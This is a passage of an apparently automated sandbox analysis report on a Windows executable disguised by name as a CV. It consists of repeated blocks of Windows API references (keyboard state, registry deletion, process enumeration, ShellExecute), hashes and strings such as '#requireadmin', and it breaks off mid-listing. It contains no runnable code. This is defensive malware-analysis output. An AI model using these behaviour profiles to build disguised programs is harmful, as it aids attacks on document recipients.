                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8af834274bd7cb910bc6b78042b011c290de8204194cc389c1c58f0ba4f14ff6
                                                                                        • Instruction ID: 62235f7b977e653ea5042881450ce1ca025470191ea46c16f665653e2c4eed93
                                                                                        • Opcode Fuzzy Hash: 8af834274bd7cb910bc6b78042b011c290de8204194cc389c1c58f0ba4f14ff6
                                                                                        • Instruction Fuzzy Hash: 9C717E71900509EFDF06CF98CC48ABEBB78FF85314F148259F916AA251C730AA11DFA5
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003E225A
                                                                                        • _memset.LIBCMT ref: 003E2323
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 003E2368
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                          • Part of subcall function 0039C6F4: _wcscpy.LIBCMT ref: 0039C717
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003E242F
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 003E243E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                        • String ID: @
                                                                                        • API String ID: 4082843840-2766056989
                                                                                        • Opcode ID: b180ed7a41cb473a4138161998e536f52f67fcb892fca816496773d6a5c52ad2
                                                                                        • Instruction ID: 54b79f3b855cfb7de467a391042d53f9cc85bc1f3b65790e7f5632fedf1b79ae
                                                                                        • Opcode Fuzzy Hash: b180ed7a41cb473a4138161998e536f52f67fcb892fca816496773d6a5c52ad2
                                                                                        • Instruction Fuzzy Hash: 83718075A006299FCF06EFA5C881AAEB7F9FF48310F118559E855AB391CB34AD40CF94
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 003C3DE7
                                                                                        • GetKeyboardState.USER32(?), ref: 003C3DFC
                                                                                        • SetKeyboardState.USER32(?), ref: 003C3E5D
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 003C3E8B
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 003C3EAA
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 003C3EF0
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003C3F13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 767569d5787ab1a8fb3b212be0da19af2dc4c3f7bd97945f8ba619561737897b
                                                                                        • Instruction ID: fdc411040bd07bbaa93535cf550623a4b9fa961c3719d24b4e6c33b96dd526f8
                                                                                        • Opcode Fuzzy Hash: 767569d5787ab1a8fb3b212be0da19af2dc4c3f7bd97945f8ba619561737897b
                                                                                        • Instruction Fuzzy Hash: 1D51C1A1A047D53DFB3742348C45FB67EA95B06304F09898DE0D5DA8C2D2A9AEC8D761
                                                                                        APIs
                                                                                        • GetParent.USER32(00000000), ref: 003C3C02
                                                                                        • GetKeyboardState.USER32(?), ref: 003C3C17
                                                                                        • SetKeyboardState.USER32(?), ref: 003C3C78
                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003C3CA4
                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003C3CC1
                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003C3D05
                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003C3D26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 844a237009b346701c5af24606a3e11bffbc26c37e1489ea4bde8585a9abb67b
                                                                                        • Instruction ID: 721fe3e7945bb09cf5e4106d0bb4bd8968788e994aa4c11206cc20bea9dd9133
                                                                                        • Opcode Fuzzy Hash: 844a237009b346701c5af24606a3e11bffbc26c37e1489ea4bde8585a9abb67b
                                                                                        • Instruction Fuzzy Hash: 8551D6A15047D53DFB3793648C59FBABE996B06300F0CC48DE0D6EA8C2D695EE84D750
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 2945705084-0
                                                                                        • Opcode ID: 6d980e5398416ba3a3db4ccb9e2932f8234a3a87c8e5e43b79915c17ce58d839
                                                                                        • Instruction ID: 41e488427777e82b908587871b3341a33c26a94cfd425d21642dd3379ed18461
                                                                                        • Opcode Fuzzy Hash: 6d980e5398416ba3a3db4ccb9e2932f8234a3a87c8e5e43b79915c17ce58d839
                                                                                        • Instruction Fuzzy Hash: 9B417266C1021476DF12EBF8CC86ACFB7ACDF06310F51896AE914F7162F634E61487A5
                                                                                        APIs
                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 003E3DA1
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E3DCB
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 003E3E80
                                                                                          • Part of subcall function 003E3D72: RegCloseKey.ADVAPI32(?), ref: 003E3DE8
                                                                                          • Part of subcall function 003E3D72: FreeLibrary.KERNEL32(?), ref: 003E3E3A
                                                                                          • Part of subcall function 003E3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003E3E5D
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 003E3E25
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                        • String ID:
                                                                                        • API String ID: 395352322-0
                                                                                        • Opcode ID: bc687366dbadc2f523752a36d6e967dea021f921f6d081a2439f8382999a664d
                                                                                        • Instruction ID: 85241564786f6901e52669c2d110f4d6f00090d57c5a702e8fb1095cb97a36ff
                                                                                        • Opcode Fuzzy Hash: bc687366dbadc2f523752a36d6e967dea021f921f6d081a2439f8382999a664d
                                                                                        • Instruction Fuzzy Hash: B631FBB2D01159BFDB159FD1DD89AFFB7BCEB48300F000269A512A7190DA709F899AA0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003E8FE7
                                                                                        • GetWindowLongW.USER32(0185E6C0,000000F0), ref: 003E901A
                                                                                        • GetWindowLongW.USER32(0185E6C0,000000F0), ref: 003E904F
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003E9081
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003E90AB
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003E90BC
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003E90D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 2178440468-0
                                                                                        • Opcode ID: 0658a0e9c756acf46844b0ce4b81cfcab7611fb2406e19d2decbb9ac29726581
                                                                                        • Instruction ID: 90ca2382e95736eb713c50b06fcb04d1facf418f1295f07f322f1b25255b2154
                                                                                        • Opcode Fuzzy Hash: 0658a0e9c756acf46844b0ce4b81cfcab7611fb2406e19d2decbb9ac29726581
                                                                                        • Instruction Fuzzy Hash: F8313374A00264EFDB228F99DC84F6437A5FB4A314F1602A6F5199F2F2CB72AC40DB44
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003C08F2
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003C0918
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 003C091B
                                                                                        • SysAllocString.OLEAUT32(?), ref: 003C0939
                                                                                        • SysFreeString.OLEAUT32(?), ref: 003C0942
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 003C0967
                                                                                        • SysAllocString.OLEAUT32(?), ref: 003C0975
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: 1873c5ab43bc52fb86e6b7e8944ded2dfd9054435b9f81ee7ed6100b35fa1dc0
                                                                                        • Instruction ID: d6b8537317bd489e913e2b327cf2472cfde138cfe514845b83412d53167798f1
                                                                                        • Opcode Fuzzy Hash: 1873c5ab43bc52fb86e6b7e8944ded2dfd9054435b9f81ee7ed6100b35fa1dc0
                                                                                        • Instruction Fuzzy Hash: 74219576601219AFEF159FA8CC88EBB73ECEB09360B418125F915EB161D770EC458B64
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                        • API String ID: 1038674560-2734436370
                                                                                        • Opcode ID: 12de5134bd42988c5dc64e4af9127174d4a78732953f346d6e762817731c3ba9
                                                                                        • Instruction ID: 870dfa3f159d8b1f477386695148edf0445a8bc4805da6387f23ff7dc19342f2
                                                                                        • Opcode Fuzzy Hash: 12de5134bd42988c5dc64e4af9127174d4a78732953f346d6e762817731c3ba9
                                                                                        • Instruction Fuzzy Hash: 07214C7220461167D727B6359C12FB7B39CEF66310F21442EF445DB082E7659D41C3A5
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003C09CB
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003C09F1
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 003C09F4
                                                                                        • SysAllocString.OLEAUT32 ref: 003C0A15
                                                                                        • SysFreeString.OLEAUT32 ref: 003C0A1E
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 003C0A38
                                                                                        • SysAllocString.OLEAUT32(?), ref: 003C0A46
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: 9cd3807526fcbf7cecfec3023dd6903f974ed6449488351b60ff5176757b08dd
                                                                                        • Instruction ID: edd7ed571670df386a3837b655ded502da136ffaf948493dafc25781280de190
                                                                                        • Opcode Fuzzy Hash: 9cd3807526fcbf7cecfec3023dd6903f974ed6449488351b60ff5176757b08dd
                                                                                        • Instruction Fuzzy Hash: C3214479600204AFDB159FE8DD89EBA77ECEF093607418129F909DB261D670EC458764
                                                                                        APIs
                                                                                          • Part of subcall function 0039D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0039D1BA
                                                                                          • Part of subcall function 0039D17C: GetStockObject.GDI32(00000011), ref: 0039D1CE
                                                                                          • Part of subcall function 0039D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0039D1D8
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003EA32D
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003EA33A
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003EA345
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003EA354
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003EA360
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        • Opcode ID: 9a60d9eb2e80ee8bad02a281693ae44d1ecec323e9c1241599dc148c113c06b2
                                                                                        • Instruction ID: 90d285e76bc547d8d30246b8a796ac7e563c3ce81de1aa790a4d32bcecd08508
                                                                                        • Opcode Fuzzy Hash: 9a60d9eb2e80ee8bad02a281693ae44d1ecec323e9c1241599dc148c113c06b2
                                                                                        • Instruction Fuzzy Hash: 1611D3B1100129BEEF115F61CC85EE77F6DFF08398F014215BA04A60A0C772AC21DBA4
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 0039CCF6
                                                                                        • GetWindowRect.USER32(?,?), ref: 0039CD37
                                                                                        • ScreenToClient.USER32(?,?), ref: 0039CD5F
                                                                                        • GetClientRect.USER32(?,?), ref: 0039CE8C
                                                                                        • GetWindowRect.USER32(?,?), ref: 0039CEA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                        • String ID:
                                                                                        • API String ID: 1296646539-0
                                                                                        • Opcode ID: 15ee829f600a0ebc1e2fd2a7ec3854663678788908c7175f3db13a40fd0dfa9a
                                                                                        • Instruction ID: d0aed3ac14399a3fe86a3d07d46ff1e7fb559d251c2304a4f672e2d82024176b
                                                                                        • Opcode Fuzzy Hash: 15ee829f600a0ebc1e2fd2a7ec3854663678788908c7175f3db13a40fd0dfa9a
                                                                                        • Instruction Fuzzy Hash: 8AB18E7991024ADBDF11CFA9C5807EEBBB1FF08300F159529ED5AEB650DB30AA50CB64
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 003E1C18
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 003E1C26
                                                                                        • __wsplitpath.LIBCMT ref: 003E1C54
                                                                                          • Part of subcall function 003A1DFC: __wsplitpath_helper.LIBCMT ref: 003A1E3C
                                                                                        • _wcscat.LIBCMT ref: 003E1C69
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 003E1CDF
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 003E1CF1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 1380811348-0
                                                                                        • Opcode ID: 210cb9486d0d1012cdd4c311d5402e1254f98ca2c8ac889b61043ad53a2bfff4
                                                                                        • Instruction ID: f1de5a37747ea562b1f36862e13e1eeb15403973d42625113d98aea645e79562
                                                                                        • Opcode Fuzzy Hash: 210cb9486d0d1012cdd4c311d5402e1254f98ca2c8ac889b61043ad53a2bfff4
                                                                                        • Instruction Fuzzy Hash: 9E516E715043409FD722EF64CC85EABB7E8EF88754F00492EF5869B291DB70D904CB92
                                                                                        APIs
                                                                                          • Part of subcall function 003E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003E2BB5,?,?), ref: 003E3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E30AF
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E30EF
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003E3112
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003E313B
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003E317E
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003E318B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                        • String ID:
                                                                                        • API String ID: 3451389628-0
                                                                                        • Opcode ID: 1a9e7a3957dd3c54c49299808229c8b919474381192ea8d4d89329740cc1ed14
                                                                                        • Instruction ID: c54a85855cb704cf2168f0a2966a84afacef58e63cc2473a2075d7c20912a916
                                                                                        • Opcode Fuzzy Hash: 1a9e7a3957dd3c54c49299808229c8b919474381192ea8d4d89329740cc1ed14
                                                                                        • Instruction Fuzzy Hash: 75516931508340AFC702EF64CC95EAABBE9FF88304F04495DF5559B2A1DB71EA09CB52
                                                                                        APIs
                                                                                        • GetMenu.USER32(?), ref: 003E8540
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 003E8577
                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003E859F
                                                                                        • GetMenuItemID.USER32(?,?), ref: 003E860E
                                                                                        • GetSubMenu.USER32(?,?), ref: 003E861C
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 003E866D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                        • String ID:
                                                                                        • API String ID: 650687236-0
                                                                                        • Opcode ID: 1528b39af82fe73cf124dac31bdfb8d70da715f90069109664e4e528f2ca1d3c
                                                                                        • Instruction ID: 9ba5450e11d6118cbe769d6a2db32bf94ad7a59d907e4023f8a9647abdbe8f3e
                                                                                        • Opcode Fuzzy Hash: 1528b39af82fe73cf124dac31bdfb8d70da715f90069109664e4e528f2ca1d3c
                                                                                        • Instruction Fuzzy Hash: 32518035E00625AFCF12EF95C941AAEB7F4EF48310F1145A9E919BB391CB70AE418B94
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003C4B10
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C4B5B
                                                                                        • IsMenu.USER32(00000000), ref: 003C4B7B
                                                                                        • CreatePopupMenu.USER32 ref: 003C4BAF
